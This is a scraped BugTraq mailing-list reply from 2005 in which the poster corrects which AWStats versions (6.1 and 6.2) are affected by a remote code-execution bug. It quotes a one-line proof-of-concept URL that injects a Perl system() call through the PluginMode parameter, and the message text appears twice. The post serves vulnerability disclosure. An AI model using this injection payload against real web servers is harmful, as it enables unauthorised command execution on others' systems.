BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
Feb 15 2005 09:23PM
Ondra Holecek (bln deprese net)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
im sorry i didnt write it, only awstat 6.1 and 6.2 is vulnerable to this
bug (system('id'), etc.)
Ondra
Ondra Holecek wrote:
| It seems this bug works only on my server, i dont know why
|
| /awstats.pl?&PluginMode=:print+system('id')+;
|
| reply:
|
| ...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
Hash: SHA1
im sorry i didnt write it, only awstat 6.1 and 6.2 is vulnerable to this
bug (system('id'), etc.)
Ondra
Ondra Holecek wrote:
| It seems this bug works only on my server, i dont know why
|
| /awstats.pl?&PluginMode=:print+system('id')+;
|
| reply:
|
| ...
[ more ]